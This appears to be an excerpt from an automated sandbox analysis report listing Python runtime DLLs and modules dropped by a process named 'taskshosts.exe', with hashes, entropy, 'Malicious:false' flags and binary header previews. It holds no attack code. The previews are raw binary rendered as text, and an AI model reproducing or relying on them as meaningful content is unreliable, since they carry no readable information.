                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................E..............................................>.................).........Rich............................PE..L....:-a...........!.....Z...V.......Y.......p......................................`<....@......................... ...P...p...x...............................$...h...T...............................@............p..0............................text...)Y.......Z.................. ..`.rdata...3...p...4...^..............@..@.data...@...........................@....rsrc...............................@..@.reloc..$...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI78242\_lzma.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):162536
                                                                                                                                            Entropy (8bit):6.9618412972272035
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:KsdGFMyIenRQWtwjETZZ2lHEH60E9DjX9WAiuwCpMxIl3YxIuG17lzHfq9mNoRGU:Ky56RQWtwjEODjX/gQl3HtiYOc7IqvXu
                                                                                                                                            MD5:02A95C6BD7852E9E5FAF24A3375D30EA
                                                                                                                                            SHA1:5DAD699FD8103183B7A5E8B06498D8F6997A8898
                                                                                                                                            SHA-256:E1B8C6D535E5070BB350799953A86AE7FF25FE90CEC81E20A18834CB6D503465
                                                                                                                                            SHA-512:CE28BA0A7C6EFF792CC8E2B9A9A9C3357A82AB0FBDC5B02837CED666CF543D41E79503AD1155D96B412D85484174DAE5DDA6B5C33A5EEC62606CCB95720E43F8
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,...B...B...B.......B...C...B...G...B...F...B...A...B...C...B...C...B...C...B...J...B...B...B.......B...@...B.Rich..B.................PE..L....:-a...........!................[.....................................................@..........................D..L....D..x....`...............^.......p..D....?..T...........................8@..@............................................text............................... ..`.rdata.............................@..@.data...`....P.......B..............@....rsrc........`.......F..............@..@.reloc..D....p.......P..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI78242\_multiprocessing.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):27368
                                                                                                                                            Entropy (8bit):6.549414263488397
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:HuDBfF4Cz7UfVqH+JxI8At42uDG4yjc/AdiYhHZ:Hu9fF4CPUfVqH+JxI8At42ayjc/ai8Z
                                                                                                                                            MD5:DD1C9450E9F4C33E47C364900D9A814D
                                                                                                                                            SHA1:E0BCD7DE6DF954309F226CA64390E95E41CECC69
                                                                                                                                            SHA-256:734AC43FD0DB3108D4BF1251F078F8F212B3B9A2DE1C46511AF7D6CA90EAF624
                                                                                                                                            SHA-512:A084F8119B99977077E3FE7B4E87722A2FE6D2C010604CFE4CE4E7A37AA621C2F974485700C969443E1B6C9AD466858607A239CC6DAD8668ECB7B61AFE98B19A
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........pb..1..1..1..1..1...0...1...0..1...0..1...0...1v..0...1...0..1..1...1v..0...1v..0..1v..1..1v..0..1Rich..1........................PE..L...m:-a...........!....."...,......:........@............................................@.........................`J..`....J.......p...............N..........T....E..T............................F..@............@..d............................text...g!.......".................. ..`.rdata.......@.......&..............@..@.data...@....`.......:..............@....rsrc........p.......>..............@..@.reloc..T............H..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI78242\_overlapped.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):39144
                                                                                                                                            Entropy (8bit):6.594969794994295
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:fSq/1fbtTv2JknGAeTP5M8IYWn06IzLnnI9I8ttQDG4yfGhHl:KmD22nGNTxUn06IzLnI9I8ttcy+l
                                                                                                                                            MD5:A9E77439A38E66AB21DA99C5C00EE0F0
                                                                                                                                            SHA1:CD3CC2BEB2C5270F9A01BF95919C3F9C4A1F16D6
                                                                                                                                            SHA-256:70538FFEFDB2F6FF8C6F29EEAF5EE4197832E83476EAC6A648A4EB14E86E90FF
                                                                                                                                            SHA-512:5E5B27ECF6850EA7A300267B0B5EEB6F85AD003E9EE8FD13EB9B6350BD520295407D1F99BC33833A4BE1E78F4914B52F8ABC3C1F4297268B151DA1DD31BB10D3
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h.P..i...i...i..q....i..|h...i..|l...i..|m...i..|j...i.{|h...i..bo...i..bh...i...h...i.{|a...i.{|i...i.{|....i.{|k...i.Rich..i.........PE..L...m:-a...........!.....<...@.......<.......P...........................................@......................... i..X...xi.......................|..............\d..T............................d..@............P...............................text...o;.......<.................. ..`.rdata...$...P...&...@..............@..@.data...$............f..............@....rsrc................j..............@..@.reloc...............t..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI78242\_queue.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):26344
                                                                                                                                            Entropy (8bit):6.465416851591826
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:cxz3Uvcqwbv6rhCGJklI8mU5DG4yihH8F:ct3UUqQyhCGJklI8mU7y68F
                                                                                                                                            MD5:A76C599AEA04E05E0D8FBD3E40C564FF
                                                                                                                                            SHA1:BD0992D395D4E2FD275C942DFA425A29333663BB
                                                                                                                                            SHA-256:5A9E30C9B0FC28E192B59930D70D4B212DBD96A14DE31D88B6F7E5C719E7B148
                                                                                                                                            SHA-512:1E3536C3F5DC439547C6F267A8F7F885E9B7F20F2A480B88DA83CB1336E25132BC4107F3C22F3FB7DE85FE762BC28D57182CF9A8CA881B3512905B1D5F5EAC66
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R..S..R..W..R..V..R..Q..R.h.S..R...S..R..S.R.h.Z..R.h.R..R.h...R.h.P..R.Rich.R.........................PE..L...o:-a...........!.........*...............0.......................................W....@......................... =..L...l=..d....`...............J.......p..l...H8..T............................8..@............0...............................text...9........................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....rsrc........`.......<..............@..@.reloc..l....p.......F..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI78242\_socket.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):71912
                                                                                                                                            Entropy (8bit):6.6304829026661345
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:XxYZ+3edCVrMD9f8+2eJiWnnCz6xlI8Bwvyj+u:BYZLdsMD9f8LeJiWnCz6xlI8Bwru
                                                                                                                                            MD5:6BA36034BC861F44E90F547C667DA40A
                                                                                                                                            SHA1:7FC6D70AC9C80E600B14760B47396369F1C3D9BE
                                                                                                                                            SHA-256:5A3E41A8C91EB5D81AC9D4A7477461414D5431754FFB9D6AD49369238D25FDD4
                                                                                                                                            SHA-512:AD49EBE8B11592088CCFDA6813DE3629C1C0EF6663D56724B6DB8F5B6B827B8CF28EF71DD7154C223F836059029CD25FF48E57EDB3D9B665157716172443B59F
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y...=.=.=.4...9.o...?.o...1.o...7.o...<.....?.)...:.=.......<.....<...q.<.....<.Rich=.........................PE..L....:-a...........!.....x..........4w.......................................0......uJ....@.............................P.................................... ..........T...............................@............................................text....v.......x.................. ..`.rdata...`.......b...|..............@..@.data...@...........................@....rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI78242\_ssl.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):143080
                                                                                                                                            Entropy (8bit):6.491073634171029
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:Dd7tm9Bt+CDEcthX+w0/13yLjqvDWb56j8RpI8M7Y8IVQ:Ddxm9Xr+w0/13+qvDWba8R3LQ
                                                                                                                                            MD5:EEFFC18404F7E10E6BFC71C5984EA3E5
                                                                                                                                            SHA1:9291C1DD62135F7FDCD61DDE80EB4B2E8B96CA0A
                                                                                                                                            SHA-256:52891F8A9751C1DED6DEA7C7313F19287E936A248AFFDBE93BC9C857294C120B
                                                                                                                                            SHA-512:C4D1FE321B457EF4BA0E79E0B22DF62D3D981C9A42A29FD8370559FEFEE225BFE21F398DE2BB58C0E91468ED87D5FDB804A605B76204B99C9F88713F67A49B41
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J...+...+...+...S$..+...^...+...^...+...^...+...^...+..J^...+...^...+...@...+...+...*..J^...+..J^...+..J^H..+..J^...+..Rich.+..........PE..L....:-a...........!.........P...............................................P............@.............................d...D................................ ..|#..(...T...............................@............................................text............................... ..`.rdata..............................@..@.data....K.......H..................@....rsrc...............................@..@.reloc..|#... ...$..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI78242\_uuid.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):20712
                                                                                                                                            Entropy (8bit):6.48424389358467
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:tD3fFhe0IjmyvNNdeTpI8DwzH6oDG4y8mKFcQhHI4:Jdhe9mTpI8DwzH1DG4yjehHI4
                                                                                                                                            MD5:2C4DBAA2151C458C8EEA5F37B2CFE673
                                                                                                                                            SHA1:72AEB5DE5E25E67F8F798AED198718B9C4A5CD97
                                                                                                                                            SHA-256:99DD17FE2D43ED007B301AA5CE80364F2C7D9BBD033E4CE0166DEFB23140DB38
                                                                                                                                            SHA-512:399491B8D9736732E404640216C8ECE073795F9966AE6D2ACFD6D64B7C6B35AB63C03287751C0AB46593B072C778E1D4051D667BA693ADBAFE0A15AE6E6019AA
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}..9...9...9...0.!.;...k..;...k..2...k..3...k..8......;...-...<...9..........8......8.....M.8......8...Rich9...........................PE..L...x:-a...........!................P........0...............................p......TU....@..........................5..L...,6..x....P...............4.......`..P....1..T...........................p1..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@.......$..............@....rsrc........P.......&..............@..@.reloc..P....`.......0..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):799949
                                                                                                                                            Entropy (8bit):5.485927763898022
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24576:1K738OQQcosQNRs54PK4ItIVwHLfVEhIESC/:1K738OfcosQNRs54PK4I7q
                                                                                                                                            MD5:A6277EDD815F1D33215C41309AA0A3B4
                                                                                                                                            SHA1:0522D880992F2BB46571E27610410A9D99B69984
                                                                                                                                            SHA-256:A6E24DEAB93CA92BB3118081E10987FB7078B0D249E38911BD0C429563941317
                                                                                                                                            SHA-512:AE83607B951996CC61BFC07AA6946BC8E6B409BC504AA92355C762420ECE2D69C2E11BB6C88D4CE81C8D0136AC82E1E04157ED02CDCA5B7D945D939D36C4AE39
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:PK..........!...#............_bootlocale.pyca.......C.O.o..v.....................@....x...d.Z.d.d.l.Z.d.d.l.Z.e.j...d...r,d.d.d...Z.nHz.e.j...W.n2..e.yh......e.e.d...rZd.d.d...Z.n.d.d.d...Z.Y.n.0.d.d.d...Z.d.S.)...A minimal subset of the locale module used at interpreter startup.(imported by the _io module), in order to reduce startup time...Don't import directly from third-party code; use the `locale` module instead!......N..winTc....................C........t.j.j.r.d.S.t.....d...S.).N..UTF-8.........sys..flags..utf8_mode.._locale.._getdefaultlocale....do_setlocale..r......_bootlocale.py..getpreferredencoding...............r......getandroidapilevelc....................C........d.S.).Nr....r....r....r....r....r....r...............c....................C........t.j.j.r.d.S.d.d.l.}.|...|...S.).Nr....r......r....r....r......localer......r....r....r....r....r....r.....................c....................C....6...|.r.J...t.j.j.r.d.S.t...t.j...}.|.s2t.j.d.k.r2d.}.|.S.).Nr......darwin..r....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI78242\libcrypto-1_1.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2265336
                                                                                                                                            Entropy (8bit):6.107347147299583
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:Tzq7OrIUW5FPdtvxE8IRHKY1CPwDv3uFfJuJy:Xq7OzUdfE8AHKY1CPwDv3uFfJ/
                                                                                                                                            MD5:31C2130F39942AC41F99C77273969CD7
                                                                                                                                            SHA1:540EDCFCFA75D0769C94877B451F5D0133B1826C
                                                                                                                                            SHA-256:DD55258272EEB8F2B91A85082887463D0596E992614213730000B2DBC164BCAD
                                                                                                                                            SHA-512:CB4E0B90EA86076BD5C904B46F6389D0FD4AFFFE0BD3A903C7FF0338C542797063870498E674F86D58764CDBB73B444D1DF4B4AA64F69F99B224E86DDAF74BB5
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.w9g..jg..jg..jn..js..j5..ke..j5..kl..j5..km..j5..km..js..kl..jg..j...j1..k...j1..kf..j1..jf..j1..kf..jRichg..j........................PE..L.....'a...........!.................f.......0................................#......"...@..............................h....!.T.....!.|............t".......".........8...............................@.............!..............................text...9........................... ..`.rdata...(...0...*..................@..@.data...4Y...`!......B!.............@....idata........!......X!.............@..@.00cfg........!......r!.............@..@.rsrc...|.....!......t!.............@..@.reloc........"......|!.............@..B................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI78242\libffi-7.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):29208
                                                                                                                                            Entropy (8bit):6.643623418348
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:l69PtXvz8cLBN3gHhY4AFlfIvDzqig2c2LuRRClfW23JLURlV5uH+6nYPLxDG4yG:l65tXvz2CTIvy2c26A35qYvWDG4yG
                                                                                                                                            MD5:BC20614744EBF4C2B8ACD28D1FE54174
                                                                                                                                            SHA1:665C0ACC404E13A69800FAE94EFD69A41BDDA901
                                                                                                                                            SHA-256:0C7EC6DE19C246A23756B8550E6178AC2394B1093E96D0F43789124149486F57
                                                                                                                                            SHA-512:0C473E7070C72D85AE098D208B8D128B50574ABEBBA874DDA2A7408AEA2AABC6C4B9018801416670AF91548C471B7DD5A709A7B17E3358B053C37433665D3F6B
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)..qm.."m.."m.."d.p"o.."?..#o.."...#n.."m.."I.."?..#f.."?..#g.."?..#n.."...#k.."...#l.."...#l.."...#l.."Richm.."................PE..L.....]...........!.....@...........E.......P......................................H.....@.........................pU.......X..P....................X.......p..<....R..............................0R..@............P...............................text...j>.......@.................. ..`.rdata..p....P.......D..............@..@.data........`.......R..............@....reloc..<....p.......T..............@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI78242\libssl-1_1.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):544504
                                                                                                                                            Entropy (8bit):5.7541372304412945
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:OcwAbgOL9BmDy2pMcdmka42bJ8Hh9sa3MU2lvzJp:O4UOBBcF2b0hma8U2lvzJp
                                                                                                                                            MD5:8471E73A5594C8FBBB3A8B3DF4FB7372
                                                                                                                                            SHA1:488772CB5BBB50F14A4A9546051EDEF4AE75DD20
                                                                                                                                            SHA-256:380BB2C4CE42DD1EF77C33086CF95AA4FE50290A30849A3E77A18900141AF793
                                                                                                                                            SHA-512:24025B8F0CC076A6656EBA288F5850847C75F8581C9C3E36273350DB475050DEEE903D034AD130D56D1DEDE20C0D33B56B567C2EF72EB518F76D887F9254B11B
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............^..^..^..E^..^..._..^..._..^..._..^..._..^..._..^..._..^..^9..^..._...^..._..^..)^..^..._..^Rich..^................PE..L...,.'a...........!.........4.......".......................................p...........@.........................`,...N........... ..s............2.......0...6......8...............................@............................................text...y........................... ..`.rdata..jj.......l..................@..@.data....;.......6...p..............@....idata...A.......B..................@..@.00cfg..............................@..@.rsrc...s.... ......................@..@.reloc..$>...0...@..................@..B................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI78242\pyexpat.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):180968
                                                                                                                                            Entropy (8bit):6.670082335019216
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:lGGzH3PDa4Wa0hDVgoApEmP/JZR8x4Hm6EJNA3Rui/IddZaUTlI8BhNjV:xzH24Wa01AEa/JZVGDNA3Rui/AaUTbjV
                                                                                                                                            MD5:46C68BBCA8A86EA6AD9B0279DED140D4
                                                                                                                                            SHA1:1FA89E41A77C5BD30799B28BBE7B2FF6FCE5183A
                                                                                                                                            SHA-256:00DF0F266070208D7087D203F5FD06E91C47C9D5C8ED449690B9443F06C8D992
                                                                                                                                            SHA-512:E75E082FBFF3FA9B9848CA5693DE0D4C5074995F9E03EEDD26FC72C90FBD9D60E257E6ECE93F2A113C6DF6401930451DF462FD8D16D14E0D249A8BEB2055D0CB
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B...,...,...,.....,...-...,...)...,...(...,.../...,.X.-...,...-...,...-...,.X.$...,.X.,...,.X.....,.X.....,.Rich..,.........PE..L...u:-a...........!................E........ ............................................@..........................j..P...0k...................................$..(f..T............................f..@............ ...............................text............................... ..`.rdata...W... ...X..................@..@.data...h............j..............@....rsrc................v..............@..@.reloc...$.......&..................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI78242\python39.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4497640
                                                                                                                                            Entropy (8bit):6.725954872872607
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:6UqQgnAHhsvhRLEmgRJEqdaNIuEBIv0BX+dCIqQKHaEMZnFPqYekTr+4mP6umenF:oaWhxKCqBI2O9qTHrMZ0Yu1P7n3zFX
                                                                                                                                            MD5:5BAFE23107E6DF19DE8F7AC9068ED26E
                                                                                                                                            SHA1:D2A88BEAF959BD5331948B03330C98FE8FA85C7C
                                                                                                                                            SHA-256:C1E5A847AE6AA9D9F42B482C7A20DCDC9DFE225F7186B0B01924225AA4E5E581
                                                                                                                                            SHA-512:1C2372DEBC0E2E53EA281798F15243294430E4E7E4D3B82E4AB998A1B7C77CAD68D50E196E37C6FF7BA83B08A12286AF5D2797BFA707AF5DAD180862CCE7EFC7
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................................x................q...................Rich...........PE..L...J:-a...........!......)...........).......)..............................pF.....?<E...@...........................?.......?.|.....C...............D.......C.0.....>.T.............................>.@.............)..............................text....).......)................. ..`.rdata...6....)..8....).............@..@.data.........@.......?.............@....rsrc.........C.......A.............@..@.reloc..0.....C.......A.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI78242\select.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):25320
                                                                                                                                            Entropy (8bit):6.533727727613444
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:KtbCEbBS3sEnqhrVusklI8mGgDG4yjshHZ:8bB4qNVusklI8mGsyjYZ
                                                                                                                                            MD5:E03B622ACBA9D02DC5A10364824EDE8C
                                                                                                                                            SHA1:40DB1A1A0D81C5D165D043502B1205B22BC238A4
                                                                                                                                            SHA-256:DE914028BFDDF19EF7279F04C92EF118C59B1BA8B5E27C76A7932E086BBC7978
                                                                                                                                            SHA-512:02ABE8C060A2E046E92DB4FDF5EFDEAF6A870703AD313D14D3E8A3A308CCA032C1D7B7AC40B0C346C0D8BF3193C42DFC69BF50450C9545D6BB6704FC0F5D3D5B
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............y..y..y......y...x..y...|..y...}..y...z..y.h.x..y...x..y..x...y.h.q..y.h.y..y.h...y.h.{..y.Rich.y.................PE..L...r:-a...........!.........&...............0.......................................9....@......................... ;..L...l;..x....`...............F.......p......d6..T............................6..@............0...............................text............................... ..`.rdata..6....0......."..............@..@.data........P.......6..............@....rsrc........`.......8..............@..@.reloc.......p.......B..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI78242\unicodedata.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1115880
                                                                                                                                            Entropy (8bit):5.387181050869946
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:D13VQCb5Pfhnzr0ql9L8kUMmuZ63NKM7IRG5eeIDe6VZyrIBHdQLhfFE+Ck5t:D13jZV0m9suVMMREtIC6Vo4u8k5t
                                                                                                                                            MD5:FED3EC3AE0C349D65C0E90025B5507E6
                                                                                                                                            SHA1:3A1864A89C90D2837B77C6A1881263E9764FF8D3
                                                                                                                                            SHA-256:CE67BBA9B38FC6023D8EFDB06223B823CEB5B7C316DA48EA1EC9E404D05384A4
                                                                                                                                            SHA-512:87047F4B55C43D59FCD643879CC2CC6D03E18963E36D6C3F49AB37C8B8672B31F61ABD9AC1FAD732778FD02FB3D1E5308572C0297FB51E2FF7C8A26354C54C58
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.eb.f.1.f.1.f.1...1.f.1S..0.f.1S..0.f.1S..0.f.1S..0.f.1...0.f.1...0.f.1.f.1Ff.1...0.f.1...0.f.1...1.f.1...0.f.1Rich.f.1........PE..L...r:-a...........!.....H...........F.......`......................................e.....@.............................X...8...........................................T...........................p...@............`..4............................text...KF.......H.................. ..`.rdata..b~...`.......L..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI80162\VCRUNTIME140.dll

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):76168
                                                                                                                                            Entropy (8bit):6.763747567766442
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:O6HuqvERNjBwySXtVaSvrgOFw9RxKMnMecbCIdFr:O6HZMRNjKySdLcOiHMecbCId
                                                                                                                                            MD5:31CE620CB32AC950D31E019E67EFC638
                                                                                                                                            SHA1:EAF02A203BC11D593A1ADB74C246F7A613E8EF09
                                                                                                                                            SHA-256:1E0F8F7F13502F5CEE17232E9BEBCA7B44DD6EC29F1842BB61033044C65B2BBF
                                                                                                                                            SHA-512:603E8DCEDA4CB5B3317020E71F1951D01ACE045468EAF118B422F4F44B8B6B2794F5002EA2E3FE9107C222E4CB55B932ED0D897A1871976D75F8EE10D5D12374
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................{.........i.............................................................Rich....................PE..L...J(.`.........."!.........................................................@............@A......................................... ...................#...0.......#..8............................#..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI80162\_asyncio.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):59112
                                                                                                                                            Entropy (8bit):6.494573911771512
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:qufUQUmEd6LO3wKb/Oz+B7RgjtWZhI8YnFcCByjWH:qWzlErbWI7RgjtWZhI8Yn2mH
                                                                                                                                            MD5:24B4C187E01530FA52F71DA2D158178C
                                                                                                                                            SHA1:C1AC16956FD2A2AE9209FD83E27D590306F959B0
                                                                                                                                            SHA-256:62744AA604A54F38EA4C5A5C538B51AB2F81EB14175101EB1D0E4381B33F996B
                                                                                                                                            SHA-512:DCA850EDC23923E69212A4786CF6CB4B9BA3BB3D931667848232A0975717FB3ED396265D787EC1D4992288C3FEFE2B700AA1FDC41361AD8D568B43EFF29B0A6E
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
